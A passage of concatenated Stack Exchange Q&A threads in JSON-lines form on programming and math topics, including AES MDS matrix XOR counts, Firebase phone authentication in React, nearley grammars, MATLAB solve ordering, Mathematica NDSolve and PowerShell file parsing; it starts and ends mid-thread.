\nMy question: Is matrix $A$ is suitable for software Implementation rather than $C$?\nEdit:(Motivated by @Richie Frame comment)\nThe inverse of $A$, denoted with $A^{-1}$, looks like to semi-circulant matrix as shown \n$$\nA^{-1}=\n \\left(\n \\begin {array}{cccc}\n 11&194&120&173\\\\ \n194&57&173&11\\\\ \n120&173&111&50\\\\ \n173&11&50&120\n\\end {array} \\right)\n$$ \nAlthough $A^{-1}$ is consist of seven elements $(11, 50,57,111, 120, 173, 194)$, from two elements $11$ and $50$ we can obtain other elements as follows\n$$\n \\left\\{\n \\begin {array}{lcr}\n11+50&=&57, \\\\\n11+50^2 &=& 120, \\\\\n11^2+50^5 &=& 173, \\\\\n11^8+50^8 &=& 194 ,\\\\\n173+194&=&111.\n\\end {array} \\right.\n$$\nEdit:(Motivated by @e-sushi comment)\nAfter Definition 5 of the second paper, we have \nFor an efficient implementation of the perfect diffusion layer, it is desirable to have maximum number of 1's and minimum number of different entries in the MDS matrix.\nAlthough based on the this terminology $C$ has an efficient implementation rather than $A$, I want to see this one by terminology of XOR and xtime. \nAfter Proposition 3 of the second paper, the authors proved that multiplication\nby the matrix of AES can be implemented using $15$ XORs, $4$ xtimes (or $4$ table lookups) and $3$ temporary variables.\nUnfortunately I do not know how to obtain XOR and xtime when the matrix $A$ is applied in MixColumns state of AES. \nIn addition,\nI used software Implementation expression in the question since the matrix of AES($C$) is a circulant matrix, but the matrix $A$ is not circulant and in 31th paper of FSE 2018, it is claimed that \nusing a circulant matrix gives adequate flexibility to\ndo a trade-off between the area requirement and clock cycle, whereas most of the other matrix types are suitable for either one but not both circumstances.\nComment: Why do you think it would be more suitable? or why do you consider it lighter ?\nComment: `Is matrix A is suitable for software Implementation rather than C?` \u2013 Depending on how you implement things, \"lighter\" as mentioned in those papers does not directly translate to \"more suitable\" when talking about implemetation. Related to that terminology: Can you please define what exactly you mean with \"more suitable for software Implementation\"? In what way?\nComment: @Ruggero Please see Section 3 of [this paper](https:\/\/www.researchgate.net\/publication\/37442986_Perfect_diffusion_primitives_for_block_ciphers_-_Building_efficient_MDS_matrices) or Section 2 of [this paper](https:\/\/link.springer.com\/article\/10.1007\/s12095-014-0116-3). The second paper explained more clearly the concept of lighter in construction of MDS matrices.\nComment: @e-sushi you right. I will edit the question to clarify what did I mean by *suitable for software Implementation*. thanks for your comment.\nAnswer: I'm not sure to what paper you reference with \"30th paper from FSE 2018\" because in this list the 30. paper is not about implementing MDS matrices. As the 31. paper is, I assume you refer to this, entitled \"Shorter Linear Straight-Line Programs for MDS matrices\".\nWhen you take the XOR count as a metric for efficiency, you can just compute this for your matrix and end up with an naive XOR count of 144, an optimized XOR count of 103 when using the SLP heuristics from the above paper. 
While the 144 XORs for the naive implementation are better than 152 XORs we would need for a naive implementation of the AES MC matrix, the later can also be optimized with SLPs and this will give you an implementation with only 97 XORs.\nSo, when only using the XOR count metric, it appears that your matrix is not more efficient than the AES matrix.\nOf course it also depends a lot what application you have, if you only need to encrypt stuff (e.g. using AES in CTR mode), looking only at the \"normal\" matrices is fine, but when you also need decryption and thus the inverse matrices, these have to be implemented as well.\nComment: @Amin235 sure you can ask me about it, I guess you are talking about our implementation (that is https:\/\/github.com\/pfasante\/shorter_linear_slps_for_mds_matrices)? Not sure thou, if this is the right place or if the github repository is the better place.\nComment: Thanks for your answer. Is it possible to ask you to address the GitHub code of SLP heuristics.\n","meta":{"source":"crypto.stackexchange","title":"A Lightweight Matrix Suggestion for MixColumns State of AES","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to create a child array from a parrent array?\n\nQuestion: My app uses multiple tableViews.\nIt contains a RootViewController having a NSMutableArray, named mainArray with id,parent_id,title,subtitle,description.\nIn my SecondTableViewController, I need to create an childArray from my mainArray depending on parent_id so I can populate the tableviewcells.\nI need my childArray1 to contain only id,title,subtitle for each parent_id = 1 childArray2 to contain only id,title,subtitle for each parent_id = 2 and so on.\nAre there some hints for doing this ? \nComment: First, have you considered working with NSDictionnary ? It will be much simpler to handle your elements because you have the key->value format instead of just indexes like in NSArray.\nComment: I am open to any new ideas. Like i said i'm new to Xcode.\nComment: Not sure to get you. Can you edit adding how mainArray is built ? It's an array of array?\nComment: the mainArray is an array from JSON.I'll give you the link to see the output of the json_ecode http:\/\/192.ro\/ibacau\/json.php\nAnswer: Try by using dictionaries, I guess is better\n<code>NSDictionary *parent = @{@\"id\":@(1),@\"title\":@\"Root\",@\"subtitle\":@\"my subtitle\",@\"description\":@\"something\"};\nNSDictionary *child1 = @{@\"id\":@(2),@\"title\":@\"Child 1\",@\"subtitle\":@\"lalalala\",@\"description\":@\"something\",@\"parent\":parent};\nNSDictionary *child2 = @{@\"id\":@(3),@\"title\":@\"Child 2\",@\"subtitle\":@\"lelelele\",@\"description\":@\"something\",@\"parent\":child1};\n\n\/\/so now, you can do something like\nchild2[@\"parent\"][@\"id\"]; \/\/ 2\nchild2[@\"parent\"][@\"parent\"][@\"title\"]; \/\/ root\n<\/code>\nComment: Thanks. 
I used the NSPredicate method.\nAnswer: Since your JSON indicates that your NSArray contains NSDictionary objects, so here is what you can do:\n<code>NSPredicate *parentPredicate = [NSPredicate predicateWithBlock:^BOOL(id evaluatedObject, NSDictionary *bindings) {\n return evaluatedObject[@\"parent_id\"] == 1; \/\/set this id to different value to get children of different parent\n }];\n\nNSArray *childArray = [parentArray filteredArrayUsingPredicate:parentPredicate];\n<\/code>\nYou can set <code>parent_id<\/code> to another value to get child array of those <code>parent_id<\/code>s.\n","meta":{"source":"stackoverflow","title":"How to create a child array from a parrent array?","dup_signals":{}},"subset":"stackexchange"} +{"text":"understanding nearley with moo resulting datastructure\n\nQuestion: I have this grammar:\n<code>let lexer = moo.compile({ \n comment: { match: \/[\\\/\\\/.*?$|][^\\n]+\/, value: (s:string) => s.slice(1).trim() },\n newline: { match: \/[\\n]+\/, lineBreaks: true }\n});\n%}\n@lexer lexer\n\nmain ->\n element\n | main %newline element \nelement -> comment \n\ncomment -> %comment\n<\/code>\nNow when I feed nearley the following input: <code>\/\/\\n\/\/\\n\/\/\\n\/\/\\n\/\/<\/code> I get this result:\n<code>[\n [\n [\n [\n [\n [\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 0,\n \"lineBreaks\": 0,\n \"line\": 1,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 2,\n \"lineBreaks\": 1,\n \"line\": 1,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 3,\n \"lineBreaks\": 0,\n \"line\": 2,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 5,\n \"lineBreaks\": 1,\n \"line\": 2,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 6,\n \"lineBreaks\": 0,\n \"line\": 3,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 8,\n \"lineBreaks\": 1,\n \"line\": 3,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 9,\n \"lineBreaks\": 0,\n \"line\": 4,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 11,\n \"lineBreaks\": 1,\n \"line\": 4,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 12,\n \"lineBreaks\": 0,\n \"line\": 5,\n \"col\": 1\n }\n ]\n ]\n ]\n]\n<\/code>\nI dont quite understand why the resulting array is so deeply nested and if theres a way to just have it flat for each elements. 
Like comments on the same semantic level should be part of one array and not nested.\nAnswer: Okay, so it turns out you have to pass a post-processor to each rule if you don't want them nested in arrays.\nFor instance like this:\n<code>main ->\n element {% d => ({ type: \"main_element\", data: d[0]}) %}\n | main %newline element {% d => ({ type: \"main_element\", data: d[2], main_data: d[0]}) %}\n\nelement -> %comment\n{% d => ({ type: \"element\", data: d[0]}) %}\n<\/code>\nThis will result in a flat structure as expected:\n<code>[\n {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 12,\n \"lineBreaks\": 0,\n \"line\": 5,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 9,\n \"lineBreaks\": 0,\n \"line\": 4,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 6,\n \"lineBreaks\": 0,\n \"line\": 3,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 3,\n \"lineBreaks\": 0,\n \"line\": 2,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 0,\n \"lineBreaks\": 0,\n \"line\": 1,\n \"col\": 1\n }\n }\n }\n }\n }\n }\n }\n]\n<\/code>\nComment: You'd be better off using a repetition operator instead of recursion. At least, that's what [nearley's author recommends](https:\/\/nearley.js.org\/docs\/how-to-grammar-good#dont-roll-your-own-unroller).\nComment: Did you try `main -> (element %newline):*`?\nComment: I read that, but cannot get it working like the repetition operator. Do you have by chance an example? @rici\n","meta":{"source":"stackoverflow","title":"understanding nearley with moo resulting datastructure","dup_signals":{}},"subset":"stackexchange"} +{"text":"Which whiteboard\/canvas app with custom background and color options\n\nQuestion: I'm looking for a PC software whiteboard application that allows for custom RGB background colors and custom RGB pen colors. Most I've seen offer only a handful of color choices for the pen.\nLucidspark, an online app, for example, offers custom RGB pen colors, but does not allow the canvas color to be changed.\nThis is to be used for my lecture\/chalk-talk recordings for undergrad higher-ed math.\nI prefer something local to my computer, and as cheap as possible, of course. Besides custom color features I think only pen thickness options would be helpful.\nAnswer: The free version of myViewBoard works. It allows for custom background and pen colors. 
You can download it as a PC app or use it online as a web app.\n","meta":{"source":"matheducators.stackexchange","title":"Which whiteboard\/canvas app with custom background and color options","dup_signals":{}},"subset":"stackexchange"} +{"text":"Firebase phone auth react js\n\nQuestion: I am trying to implement firebase phone authentication in react js without using the firebase UI.\nHow do I do it?\ncode\n\n<code>requestVerificationCode = () => {\n const { phoneNumber } = this.state;\n const appVerifier = new firebase.auth.RecaptchaVerifier(\n \"recaptcha-container\"\n );\n if (phoneNumber < 10) {\n this.setState({ error: true });\n } else {\n this.setState({ message: \"Sending code ...\" });\n\n firebase\n .auth()\n .signInWithPhoneNumber(phoneNumber, appVerifier)\n .then(confirmResult =>\n this.setState({ confirmResult, verifying: true })\n )\n .catch(error =>\n this.setState({\n message: `Sign In With Phone Number Error: ${error.message}`\n })\n );\n }\n };<\/code>\n\nerror\n\nauth.esm.js:282\nUncaught K\u00a0{code: \"auth\/argument-error\", message: \"reCAPTCHA container is either not found or already contains inner elements!\"}\nComment: what have you tried so far?\nComment: You need to have an element with the ID of `recaptcha-container` in your html\nComment: what was the error?\nComment: Still not working @TheUnreal\nComment: I don't have enough reputation to comment, but I managed to get the above working by including e.preventDefault().\nAnswer: The important part is to wait for <code>componentDidMount()<\/code> or <code>mounted()<\/code> in Vue JS so that the dom element containing <code>\"recaptcha-container\"<\/code> is mounted.\nHTML\n<code><input id=\"recaptcha-container\" type=\"button\" onClick=\"this.onClick\" \/>\n<\/code>\nJS\n<code>componentDidMount () {\n window.recaptchaVerifier = new firebase.auth.RecaptchaVerifier(\"recaptcha-container\",\n {\n size:\"invisible\"\n \/\/ other options\n });\n}\n\nonClick() {\n const phoneNumber = this.phone;\n const appVerifier = window.recaptchaVerifier;\n firebase\n .auth()\n .signInWithPhoneNumber(phoneNumber, appVerifier)\n .then(confirmResult => {\n \/\/ success\n })\n .catch(error => {\n \/\/ error\n });\n}\n<\/code>\nIf you re-direct the user away from your component where <code>id=\"recaptcha-container\"<\/code> lives, then recaptcha will work fine but throw a style related error in the console, but that's because it's wants a permanent place on the page. \nAnswer: In React JS you will need to put this in index.html in public folder.\n<code><input id=\"recaptcha-container\" type=\"button\" onClick=\"this.onClick\" \/>\n\n<\/code>\nAlternatively, you can also create the html on dom.\n<code> const tag = document.createElement(\"input\");\n tag.id = \"recaptcha-container\"; \/\/ need to be same id as your firebase.auth.RecaptchaVerifier below\n tag.type=\"button\" \n tag.onClick=\"this.onClick\"\n document.body.appendChild(tag);\n<\/code>\nthen\n<code>window.recaptchaVerifier = new firebase.auth.RecaptchaVerifier(\"recaptcha-container\", {\n size: \"invisible\",\n callback: (response) => {\n \/\/ reCAPTCHA solved, allow signInWithPhoneNumber.\n console.log(\"Submitted window.recaptchaVerifier: \", response);\n\n },\n \"expired-callback\": (e) => {\n console.log(\"Expired Callback: \", e);\n \/\/ Response expired. 
Ask user to solve reCAPTCHA again.\n \/\/ ...\n },\n });\n<\/code>\n","meta":{"source":"stackoverflow","title":"Firebase phone auth react js","dup_signals":{}},"subset":"stackexchange"} +{"text":"order of the outputs for the MATLAB solve function\n\nQuestion: I have been tinkering with the MATLAB solve function for a while, but cannot seem how it determines the order that it outputs the symbolic variables. \nSpecifically, I have a system of equations that I want to solve simultaneously.\n<code>a = f(a, b, c, d)\nb = f(a, b, c, d)\nc = f(a, b, c, d)\nd = f(a, b, c, d)\n<\/code>\nand these equations are symbolic and have other symbolic variables (aside from a, b, c, and d). (so the solution outputs aren't numeric, but are symbolic). \nFor example, when I am solving the for the equations of motion for an inverted spring pendulum, I have two equations that are both dependent on phiDDot and lenDDot. I use the solve function to solve for phiDDot and lenDDot separately using this call:\n<code>[eom2, eom1] = solve(Lag(1)==0, Lag(2)==0, ddphi, ddlen);\n<\/code>\nThe solution for ddphi corresponds to the second term of the matrix outputted, while ddlen corresponds to the first term of the matrix. I was wondering whether there was some way to tell MATLAB to output ddphi first and ddlen second, or at least determine what order they are outputted. Not knowing the order of the variables becomes a big problem when I am solving for more than 4 variables, and trying to solve the differential equations using ode45. \nAny advice would be helpful!!\nAnswer: I believe that it's alphabetical based on the ASCII values of the variable names in your equations. As per the documentation for <code>solve<\/code>, <code>sym\/symvar<\/code> is used to parse the equations in the case where you don't supply the names of output variables. The help for <code>sym\/symvar<\/code> indicates that it returns variables in lexicographical order, i.e. alphabetical (<code>symvar<\/code> does the same, even though it doesn't say so, by making calls to <code>setdiff<\/code>). If you look at the actual code for solve.m (type <code>edit solve<\/code> in your command window) and examine the sub-function called <code>assignOutputs<\/code> (line 190 in R2012b) you'll see that it makes a call to <code>sort<\/code> and that there's a comment about lexicographical order.\nIn R2012b (and likely earlier) the documentation differs from that of R2013a in a way that seems relevant to your issue. In R2013a, this sentence is added:\n\nIf you explicitly specify independent variables <code>vars<\/code>, then the solver uses the same order\n to return the solutions.\n\nI'm still running R2012b, so I can't confirm this different behavior.\n","meta":{"source":"stackoverflow","title":"order of the outputs for the MATLAB solve function","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fill section of contour with solid color\n\nQuestion: I have a contour plot with some z values equal to zero. I want to shade all these values a particular color, from this\n\nto this (MS Paint mock-up).\n\nHow can I go about doing so? Is there some feature in the library that will allow me to do this?\nComment: You would draw a filled contour (=`contourf`) plot of the contour you like to shade. Note that this question does not comply to [ask]. You should clearly state what problem you have and in how far other resources are not helping. 
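In concrete terms, that suggestion could look roughly like the sketch below (made-up data; the flat z region is filled with <code>contourf<\/code> and the line contours are drawn afterwards so they end up on top):\n<code>import numpy as np\nimport matplotlib.pyplot as plt\n\n# made-up data with a flat z == 0 region in the middle\nx = np.linspace(-3, 3, 200)\ny = np.linspace(-2, 2, 200)\nX, Y = np.meshgrid(x, y)\nZ = np.maximum(X**2 + Y**2 - 1, 0)      # exactly zero inside the unit circle\n\neps = 1e-9\nplt.contourf(X, Y, Z, levels=[-eps, eps], colors=['0.6'])   # solid grey where Z == 0\nplt.contour(X, Y, Z, levels=10, colors='k', linewidths=1)   # contour lines drawn on top\nplt.show()\n<\/code>\nIf the grey fill still hides some of the lines, an explicit <code>zorder<\/code> can be passed to the two calls.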
If you have a problem with implementing anything using `contourf` you need to show the [mcve] of the code that fails in doing so.\nComment: @ImportanceOfBeingErnest Yes, that is exactly what I was looking for. I did a `contourf` for the gray fill followed by a `contour` for the contour lines. The only problem is that the gray fill overlaps some of the lines. Is there a way to fix this? I want to draw the contour lines over the gray fill.\nComment: I have no way of knowing what you did and how the resulting plot looks like. I can only give you advice on reproducible code, again, see [mcve].\nAnswer: Have a look at the <code>matplotlib<\/code> contourplot and colormap demos. From the contour plot demo's last example, you can specify a colour map for the contour plot as follows\n<code>plt.figure()\n# plots a bunch of colours\nim = plt.imshow(Z, interpolation='bilinear', origin='lower',\n cmap=cm.gray, extent=(-3, 3, -2, 2))\n\n# plot the contour lines \nlevels = np.arange(-1.2, 1.6, 0.2)\nCS = plt.contour(Z, levels,\n origin='lower',\n linewidths=2,\n extent=(-3, 3, -2, 2))\n<\/code>\nyou'll need to define your own color map if you want to leave some regions white\/unfilled. The colormap is just a <code>dict<\/code> that maps numeric values to colours\nhttps:\/\/matplotlib.org\/examples\/pylab_examples\/contour_demo.html\nhttps:\/\/matplotlib.org\/examples\/pylab_examples\/custom_cmap.html\nComment: No, `imshow` does not seem to be well suited here. As commented above, using `contourf` would be the way to go.\n","meta":{"source":"stackoverflow","title":"Fill section of contour with solid color","dup_signals":{}},"subset":"stackexchange"} +{"text":"pl\/sql: stored procedure table or view does not exist\n\nQuestion: I have two tables CUSTOMER and ORDER from the same tablespace.\nIf I do <code>select * from CUTOMER.date a left join ORDER.date b on a.id = b.id<\/code>, it will work fine.\nIf I create a stored procedure like:\n<code>CREATE OR REPLACE PROCEDURE aProc(prc OUT Sys_Refcursor)\nAS\nBEGIN\nOPEN prc for select * from CUTOMER.date a left join ORDER.date b on a.id = b.id;\nEND aProc;\n<\/code>\nIt will cause error: \n\nTable or view does not exist.\n\nIf I change the procedure name aProc to CUSTOMER.aProc, only ORDER will cause the table does not exist error.\nI also tried AUTHID CURRENT_USER, which doesn't work.\nIs there any way I can get both tables?\nComment: Can you post the exact query rather a mocked one.\nComment: on which schema is the procedure been created?\nAnswer: I've solved the problem by adjusting the levels of packages, thank you for your attention anyways\n","meta":{"source":"stackoverflow","title":"pl\/sql: stored procedure table or view does not exist","dup_signals":{}},"subset":"stackexchange"} +{"text":"The provider is spring data rest ,client is use feign with page not work\n\nQuestion: my boot is 2.0.5\nI have tried include \n<code>compile('org.springframework.boot:spring-boot-starter-hateoas')\n<\/code>\nand feign code:\n<code>@GetMapping\nPagedResources<Subject> findAll();\n<\/code>\nand replace PagedResources to Resources ,don't work.\nand I also want to know the client controller how set the page param. can elegance to pass the controller param to feign then to the data-rest provider.\nComment: I don't really understand your question. What Exactly does not work? If possible, provide git project to test this.\nAnswer: Spring Data elements such as <code>Pageable<\/code> are not supported by Spring Cloud OpenFeign. 
See Support Spring Data Pageable in Feign Client.\n","meta":{"source":"stackoverflow","title":"The provider is spring data rest ,client is use feign with page not work","dup_signals":{}},"subset":"stackexchange"} +{"text":"Undefined Reference when using a C++ library function\n\nQuestion: Using Code::Blocks and the GNU GCC compiler, I went along and made my own library:\n<code>\/\/main.cpp (Library)\nint SampleAddInt(int i1, int i2)\n{\n return i1 + i2;\n}\n<\/code>\nCompiled it to a .a file. I then made a separate project to test the library function with. Made sure I linked it correctly in the Build Options. Here's my code using it in my project:\n<code>\/\/main.cpp (Test Project)\n#include <iostream>\n\nusing namespace std;\n\n\/\/Declaration of function from library\nint SampleAddInt(int i1, int i2);\n\nint main(){\n int x = SampleAddInt(2, 4);\n cout << x << \"test\" << endl;\n}\n<\/code>\nGot this error when trying to compile my Test Project:\n\nmain.cpp|9|undefined reference to `SampleAddInt(int, int)'|\n\nFor some reason it can't seem to find this function. I then wrapped extern \"C\" { ... } around the declaration in my Test Project main.cpp source and it built correctly.\nWhy, when my library was compiled from a main.cpp source, do I need to use extern \"C\" for my library to work with my Test Project? And why when I don't use extern \"C\", does the compiler tell me that the function is an undefined reference?\nComment: Did you accidentally compile the library file using `gcc` instead of `g++` maybe?\nComment: I used the Code::Blocks IDE. When I was setting up the IDE it asked me which compiler to use and I chose the GNU GCC compiler. Is this not correct? I recall reading that the GNU GCC compiler and compile both C and C++. It's the only one that's detected on my system.\nComment: It's the same compiler, correct, but you have to be sure to compile c++ files in c++ mode. Usually this is the default if `g++` is used. You should see the commandline command that are used in the console window of codeblocks.\nComment: Ah you're right, it's using mingw32-gcc.exe. How do I switch this so .cpp files will automatically get compiled using mingw32-g++.exe ?\nComment: In toolchain executables tab in my global compiler settings, it shows that the C++ compiler is set to mingw32-g++.exe. Why is this using gcc still?\nComment: It's maybe a problem with your [project settings](http:\/\/www.codeblocks.org\/docs\/main_codeblocks_en.html). Sorry I don't have the time right now to research that further for you.\nAnswer: Got it working.\nThe problem was it had to do with Code::Blocks.\nIt was using the gcc compiler instead of g++ so I was forced to use extern \"C\" if I wanted to run any of my library code.\nTo fix this I right clicked main.cpp, clicked Properties, and changed the variable from \"CC\" to \"CPP\" and it now compiles with g++.\n","meta":{"source":"stackoverflow","title":"Undefined Reference when using a C++ library function","dup_signals":{}},"subset":"stackexchange"} +{"text":"NDSolve for PDE with discontinuous initial\/terminal condition\n\nQuestion: I have an issue with NDSolve for the case of a PDE with discontinuous initial\/terminal condition. Consider the PDE solution\n<code>Z=z\/.First[NDSolve[{\n D[z[t,x],t] == z[t,x] D[z[t,x],x]-1\/2 (1-t)^2 D[z[t,x],{x,2}],\n z[1,x]==UnitStep[x],\n z[t,-5000]==0,\n z[t,5000]==1},\n {z},{t,0,1},{x,-5000,5000}]]\n<\/code>\nThe terminal condition is the discontinuous UnitStep function. 
When I plot the solution for t=1 now,\n<code>Plot[Z[1, x], {x, -10, 10}]\n<\/code>\n\nMathematica has obviously smoothened the terminal condition (which was explicitly given by the UnitStep function).\nIs it possible to disable this smoothing? Or at least, I want to have a smooth function that does not exceed 1 and does not go below 0.\nNote: What I am not searching for is a solution like \"increase the MaxSteps\" or something similar. I am interested in options on how Mathematica processes the initial\/terminal condition.\nThanks a lot for your help!!\nAnswer: For the given grid resolution, you're probably going to have to smooth the <code>UnitStep<\/code> function with a width equal to that grid spacing (at least). Here is one way to do that, using the Fermi function instead of <code>UnitStep<\/code>:\n<code>f[x_, d_] := 1\/(E^(-(x\/d)) + 1)\nZ = z \/. First[\n With[{d = 5000.\/10000}, \n NDSolve[{D[z[t, x], t] == \n z[t, x]*D[z[t, x], x] - 1\/2*(1 - t)^2*D[D[z[t, x], x], x], \n z[1, x] == f[x, d], z[t, -5000] == f[-5000, d], \n z[t, 5000] == f[5000, d]}, {z}, {t, 0, 1}, {x, -5000, 5000}]]]\n\nPlot[Z[1, x], {x, -10, 10}]\n<\/code>\n\nHere, the parameter <code>d<\/code> is the smoothing of the vertical step.\nComment: Thanks for your quick reply. Smoothing the function in advance looks like a good workaround to me. However, I would like to know what kind of smoothing procedure Mathematica uses internally and if I can modify or disable it.\nComment: @Posch79 Could just be numerical instability of whatever solution method is used, try tweaking the `Method` argument and see if\/how it changes\nComment: In general, though, I don't know the answer to how the interpolation can be influenced. No matter what you do, the grid limits how fast your spatial variations can be. And `UnitStep` will *always* be too steep. But one can probably construct a more customized solution using `NDSolve\\`ProcessEquations`.\n","meta":{"source":"mathematica.stackexchange","title":"NDSolve for PDE with discontinuous initial\/terminal condition","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I make this PowerShell script parse large files faster?\n\nQuestion: I have the following PowerShell script that will parse some very large file for ETL purposes. For starters my test file is ~ 30\u00a0MB. Larger files around 200\u00a0MB are expected. 
So I have a few questions.\nThe script below works, but it takes a very long time to process even a 30\u00a0MB file.\nPowerShell Script:\n<code>$path = \"E:\\Documents\\Projects\\ESPS\\Dev\\DataFiles\\DimProductionOrderOperation\"\n$infile = \"14SEP11_ProdOrderOperations.txt\"\n$outfile = \"PROCESSED_14SEP11_ProdOrderOperations.txt\"\n$array = @()\n\n$content = gc $path\\$infile |\n select -skip 4 |\n where {$_ -match \"[|].*[|].*\"} |\n foreach {$_ -replace \"^[|]\",\"\" -replace \"[|]$\",\"\"}\n\n$header = $content[0]\n\n$array = $content[0]\nfor ($i = 1; $i -le $content.length; $i+=1) {\n if ($array[$i] -ne $content[0]) {$array += $content[$i]}\n}\n\n$array | out-file $path\\$outfile -encoding ASCII\n<\/code>\nDataFile Excerpt:\n<code>---------------------------\n|Data statistics|Number of|\n|-------------------------|\n|Records passed | 93,118|\n---------------------------\n02\/14\/2012 Production Operations and Confirmations 2\n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\nProduction Operations and Confirmations\n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n|ProductionOrderNumber|MaterialNumber |ModifiedDate|Plant|OperationRoutingNumber|WorkCenter|OperationStatus|IsActive| WbsElement|SequenceNumber|OperationNumber|OperationDescription |OperationQty|ConfirmedYieldQty|StandardValueLabor|ActualDirectLaborHrs|ActualContractorLaborHrs|ActualOvertimeLaborHrs|ConfirmationNumber|\n|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n|180849518 |011255486L1 |02\/08\/2012 |2101 | 9901123118|56B30 |I9902 | |SOC10MA2302SOCJ31| |0140 |Operation 1 | 1 | 0 | 0.0 | | 499.990 | | 9908651250|\n|180849518 |011255486L1 |02\/08\/2012 |2101 | 9901123118|56B30 |I9902 | |SOC10MA2302SOCJ31|14 |9916 |Operation 2 | 1 | 0 | 499.0 | | | | 9908532289|\n|181993564 |011255486L1 |02\/09\/2012 |2101 | 9901288820|56B30 |I9902 | |SOC10MD2302SOCJ31|14 |9916 |Operation 1 | 1 | 0 | 499.0 | | 399.599 | | 9908498544|\n|180885825 |011255486L1 |02\/08\/2012 |2101 | 9901162239|56B30 |I9902 | |SOC10MG2302SOCJ31| |0150 |Operation 3 | 1 | 0 | 0.0 | | 882.499 | | 9908099659|\n|180885825 |011255486L1 |02\/08\/2012 |2101 | 9901162239|56B30 |I9902 | |SOC10MG2302SOCJ31|14 |9916 |Operation 4 | 1 | 0 | 544.0 | | | | 9908858514|\n|181638583 |990104460I0 |02\/10\/2012 |2101 | 9902123289|56G99 |I9902 | |SOC11MAR105SOCJ31| |0160 |Operation 5 | 1 | 0 | 1,160.0 | | | | 9914295010|\n|181681218 |990104460B0 |02\/08\/2012 |2101 | 9902180981|56G99 |I9902 | |SOC11MAR328SOCJ31|0 |9910 |Operation 6 | 1 | 0 | 916.0 | | | | 9914621885|\n|181681036 |990104460I0 |02\/09\/2012 |2101 | 9902180289|56G99 |I9902 | 
|SOC11MAR108SOCJ31| |0180 |Operation 8 | 1 | 0 | 1.0 | | | | 9914619196|\n|189938054 |011255486A2 |02\/10\/2012 |2101 | 9999206805|5AD99 |I9902 | |RS08MJ2305SOCJ31 | |0599 |Operation 8 | 1 | 0 | 0.0 | | | | 9901316289|\n|181919894 |012984532A3 |02\/10\/2012 |2101 | 9902511433|A199399Z |I9902 | |SOC12MCB101SOCJ31|0 |9935 |Operation 9 | 1 | 0 | 0.5 | | | | 9916914233|\n|181919894 |012984532A3 |02\/10\/2012 |2101 | 9902511433|A199399Z |I9902 | |SOC12MCB101SOCJ31|22 |9951 |Operation 10 | 1 | 0 | 68.080 | | | | 9916914224|\n<\/code>\nComment: A search for \"Get-Content large files\" was very helpful. See http:\/\/rkeithhill.wordpress.com\/2007\/06\/17\/optimizing-performance-of-get-content-for-large-files\/.\nAnswer: Your script reads one line at a time (slow!) and stores almost the entire file in memory (big!).\nTry this (not tested extensively):\n<code>$path = \"E:\\Documents\\Projects\\ESPS\\Dev\\DataFiles\\DimProductionOrderOperation\"\n$infile = \"14SEP11_ProdOrderOperations.txt\"\n$outfile = \"PROCESSED_14SEP11_ProdOrderOperations.txt\"\n\n$batch = 1000\n\n[regex]$match_regex = '^\\|.+\\|.+\\|.+'\n[regex]$replace_regex = '^\\|(.+)\\|$'\n\n$header_line = (Select-String -Path $path\\$infile -Pattern $match_regex -list).line\n\n[regex]$header_regex = [regex]::escape($header_line)\n\n$header_line.trim('|') | Set-Content $path\\$outfile\n\nGet-Content $path\\$infile -ReadCount $batch |\n ForEach {\n $_ -match $match_regex -NotMatch $header_regex -Replace $replace_regex ,'$1' | Out-File $path\\$outfile -Append\n }\n<\/code>\nThat's a compromise between memory usage and speed. The <code>-match<\/code> and <code>-replace<\/code> operators will work on an array, so you can filter and replace an entire array at once without having to foreach through every record. The <code>-readcount<\/code> will cause the file to be read in chunks of $batch records, so you're basically reading in 1000 records at a time, doing the match and replace on that batch then appending the result to your output file. Then it goes back for the next 1000 records. Increasing the size of 